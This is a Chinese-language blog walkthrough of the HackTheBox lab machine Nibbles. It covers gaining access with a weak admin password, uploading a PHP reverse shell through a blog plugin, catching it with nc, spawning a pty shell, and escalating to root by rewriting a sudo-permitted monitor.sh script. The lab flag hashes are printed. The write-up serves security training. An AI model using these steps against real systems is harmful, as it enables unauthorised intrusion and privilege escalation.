HackTheBox-LPE-Nibbles #Linux

已于 2023-12-18 22:26:00 修改
阅读量846 收藏
点赞数 41
文章标签: linux 运维 服务器
于 2023-12-15 21:43:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39974634/article/details/135023645
版权

10.10.10.75  nmap扫描出22,80端口

访问80端口  同时gobuster一下

gobuster .htb没啥内容,重新爆破一下nibbleblog目录

访问admin.php

使用弱密码admin:nibbles成功了

看一下cve

进去之后点一点

下面版本找到

在plugins里找到my image

上传pentest monkey的reverse shell php

去哪找呢?  一开始探测的时候看到了文件目录,记得那个文件目录吗

点这个重定向的内容进入目录  admin和content都可以点,但是最后是在content里

最后在/nibbleblog/content/private/plugins/my_image找到了这个文件

nc等待连接,点击image.php


python开一个交互式shell

$ python3 -c "import pty;pty.spawn('/bin/bash');"
nibbler@Nibbles:/$ uname -a
uname -a
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
nibbler@Nibbles:/$ cat /etc/os-release  
cat /etc/os-release
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

进去发现ubuntu16.04 内核4.4,试一试44298

不行,没成功

用一下Linenums看看

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

提醒我sudo -l 有个shell文件

看一下nibbler目录下有个zip文件

zip一下,同样看到了monitor,又臭又长,这是gpt的解释:

这个脚本是一个Linux服务器健康监测脚本,名为Tecmint_monitor.sh。它用于收集和显示关于服务器的一些基本信息,包括:

连接互联网的状态
操作系统类型(如GNU/Linux)
操作系统名称和版本(例如Ubuntu 20.04.2 LTS)
硬件架构(例如x86_64)
内核版本
主机名
内部IP地址
外部IP地址
DNS服务器
登录用户
RAM和SWAP使用情况
磁盘使用情况
系统负载平均值
系统运行时间
该脚本具有以下功能选项:

使用-i参数安装脚本到/usr/bin/monitor,并提示用户已经成功安装。
使用-v参数显示脚本的版本信息。
脚本首先处理命令行参数,然后根据参数执行相应的操作。如果没有提供任何参数,则会执行完整的服务器健康检查并显示结果。最后,删除临时文件并清除所有定义的变量。

echo "cat /root/root.txt" > monitor.sh

sudo -u root ./monitor.sh

这是是一个命令,它的作用是在Unix或类Unix系统中以root用户的身份执行名为 monitor.sh 的shell脚本。

sudo 是超级用户(Super User)做的缩写,它允许普通用户暂时获得root权限来执行需要更高权限的任务。  

sudo 命令中,-u 参数是用来指定切换到哪个用户身份来执行后续的命令。当与 -u 参数一起使用时,后面的值应该是你要模拟的用户的用户名。
-u root 表示指定要使用的用户为root,也就是系统的超级用户。
./monitor.sh 是指当前目录下的名为 monitor.sh 的shell脚本。
整个命令的意思是:以root用户身份运行当前目录下的 monitor.sh 脚本。这通常是因为 monitor.sh 需要访问或更改一些只有root权限才能操作的系统资源或文件。

通过sudo -u root ./monitor.sh因为sudo规定了不需要密码就可以执行

user:b81929da18fdaf194a7c388ee5430c8b

root:f096489c99f11ae4d59b555b5e3a920b

行者孙Sun
关注
  • 41
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HackTheBox-LPE-help #Linux
weixin_39974634的博客
12-14 179
pty.spawn('/bin/bash')"生成交互式shell。虽然显示file not found ,但是文件已经被上传到了网站上,立即执行python脚本,找到文件。可以用helpme@helpme.com:godhelpmeplz去登录helpdeskZ。搜索helpdeskZ,在github上发现已经是八年前更新的组件了。登录以后,上传一个ticket,查看路径。查看user.txt 和root.txt。查看内核版本4.4.0,可执行提权。点击链接执行反弹shell,成功。
HackTheBox-LPE-SwagShop #Linux(网络问题。烂尾)
weixin_39974634的博客
12-13 25
guide模式下填写答案,2个tcp,电子商务软件magento。下载magescan工具,扫描magento版本为1.9.0.0。magento 搜索路径下找到mysql信息,保存起来后续用。后面因为网络原因poc应用不了,遂中止。searchsploit查找,rce。把ip地址添加到hosts文件中。访问swagshop.htb。
HackTheBox-LPE-Mirai #Linux
weixin_39974634的博客
12-16 266
是一种非标准的HTTP头部字段,它出现在Pi-hole这一DNS沉洞服务器的服务响应中。Pi-hole是一种流行的开源广告拦截解决方案,它通过充当网络上的DNS服务器来阻止广告请求。当您访问Pi-hole的管理界面或者从受到Pi-hole保护的网络中发起DNS查询时,可能会看到这个特殊的HTTP头字段。运行rm命令并不会改变文件在内存中的内容,它只是更改了围绕文件的元数据,告诉操作系统现在这部分内存可用于写入。文件中,这样就可以在不插拔实际硬件的情况下查看或恢复设备上的数据。设备上的所有数据克隆到。
No.61-HackTheBox-windows-Conceal-Walkthrough渗透学习
qq_34801745的博客
02-26 595
** HackTheBox-windows-Conceal-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/168 靶机难度:中级(5.0/10) 靶机发布日期:2019年5月8日 靶机描述: Conceal is a “hard” difficulty Windows which teaches enumer...
HackTheBox LPE Node #Linux(更新中)
weixin_39974634的博客
12-17 41
mongodb:// # 必需的前缀,表示这是一个 MongoDB 连接字符串。mark:5AYRft73VtFpc84k@ # 用户名(mark)和密码(5AYRft73VtFpc84k)部分,用冒号分隔。这是可选的,如果有身份验证需求则使用。解码发现是zip 没有解压密码有的看不了,试试fcrackzip。F12到js查看,指引了个/api/users。m是1400,用hashcat 跑一下。咋整,调查一下信息,比如看tom的进程。解压后,在app.js发现这个。gobuster不行。
CVE-2023-35001 - nf_tables - LPE - Pwn2Own Vancouver 2023
黑战士的博客
05-20 573
如果篡改rule指针使得handle对应ops的低位(这里省略了rule的内存布局分析),那么就能泄漏ops的大部分地址,加上高位都是1的前提,我们就知道了ops的地址。首先因为表达式设置是确定的,所以偏移是确定的。我们要让rule指向靠近ops的位置,只需要泄漏chain、rule、last_rule指针,把他们加上一个偏移就能得到目标地址,再越界写来篡改。byteorder的ops->size正好是0x10,正好可以让下一个expr指向range的尾部,下一个expr原本就应该是range的尾部。
第十一章 PX4-Pixhawk-LPE位置估计
qq_18112493的博客
01-21 2311
  位置估计的解析我们还是遵循源代码的规则,至于组合惯导和扩展卡尔曼我们以后慢慢分析,这里主要还是对源代码来进行解析。  在前一章节我们找到SYS_MC_EST_GROUP参数设置的是1,采用的是LPE算法,所以也就启动的是local_position_estimator.cpp。回到该cpp文件中,我们开始一步一步的进行解析。  还是一样找到入口函数“local_position_es
编译rust for linux内核源码(5.16.0-rc3)
weixin_42915431的博客
12-09 2870
本文针对rust for linux内核源码进行编译,跟主线版本的linux编译稍有不同,因为引入了rust,编译rust需要安装相关工具,以下部分会详细介绍如何编译rust for linux。 ​
CVE-2021-4034 Linux Polkit pkexec权限提升漏洞
god_Zeo的安全博客
01-26 4804
0x01 CVE-2021-4034 漏洞详情 Polkit(PolicyKit)是一个用于控制类Unix系统中系统范围权限的组件,它为非特权进程与特权进程的通信提供了一种有组织的方式。pkexec是Polkit开源应用框架的一部分,它负责协商特权进程和非特权进程之间的互动,允许授权用户以另一个用户的身份执行命令,是sudo的替代方案。 1月25日,研究人员公开披露了在 polkit 的 pkexec 中发现的一个权限提升漏洞(CVE-2021-4034 ,也称PwnKit),它存在于所有主流的 Linux
CVE-2020-0796-LPE-POC:CVE-2020-0796本地特权提升POC
03-20
CVE-2020-0796本地特权提升POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误POC检查CVE-2020-0796 /“ SMBGhost”预期结果:启动cmd.exe并具有系统访问权限仅用于公司环境中的教育和测试。...
CAJViewer-LPE-Exploit
05-18
CAJViewer-LPE-漏洞利用 关键点 : 1. PagedPool溢出 2.堆喷涂私有名称空间对象
CVE-2020-0796:CVE-2020-0796-Windows SMBv3 LPE攻击#SMBGhost
03-19
CVE-2020-0796 Windows SMBv3 LPE漏洞利用 作者 丹尼尔·加西亚·古铁雷斯( ) 曼努埃尔·布兰科·帕拉洪( ) 漏洞利用分析 参考
lpe:Linux特权升级
05-04
Linux特权升级 该脚本将下载常见的linux特权升级工具,然后在端口8990上将它们与python的http.server一起提供,以便您可以在目标计算机上下载它们。 如何开始使用它? git clone https://github.com/melnicek/lpe ...
CVE-2018-8120:CVE-2018-8120 Windows LPE攻击
05-16
CVE-2018-8120 Windows LPE攻击 同时支持x32和x64。 经过测试:Win7 x32,Win7 x64,Win2008 x32,Win2008 R2 x32,Win2008 R2 Datacenter x64,Win2008 Enterprise x64。 用法 CVE-2018-8120 exploit by @unamer...
Linux】Xshell和Xftp简介_安装_VMware虚拟机使用
wosixiaokeai的博客
06-19 1226
Xftp是一个功能强大的SFTP、FTP文件传输软件,它允许MS Windows用户安全地在UNIX/Linux和Windows PC之间传输文件。Xftp支持SFTP协议,确保所有通过该软件的网络流量都是加密的。它采用了标准的Windows风格的向导,用户界面直观易用,可以很好地与其他Windows应用程序协同工作。Xftp的特色功能包括同步功能、直接编辑远程文件、多窗格支持、文件交换协议(FXP)支持等,这些功能使得文件传输更加容易和快捷。
Linux中文件查找相关命令比较
lurenyi168的专栏
06-16 444
Linux中与文件定位的命令有find、locate、whereis、which,type。
Rocky Linux设置静态IP
最新发布
人工智能
06-22 43
【代码】Rocky Linux设置静态IP。
SUSE linux的快照和恢复
大龄IT民工
06-19 1141
openSUSE默认提供了通用场景下的快照设置,你也可以根据需要进行修改。
PSEN sg2c-3LPE switch接线
09-08
对PSEN sg2c-LPE开关的接线,您可以按照以下步骤进行操作: 1. 首先,确认您已经了解了开关的接线图和规格说明。查看开关上是否有标签或图示,可以帮助您确定正确的接线方式。 2. 确保工作区域处于安全状态,断开...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值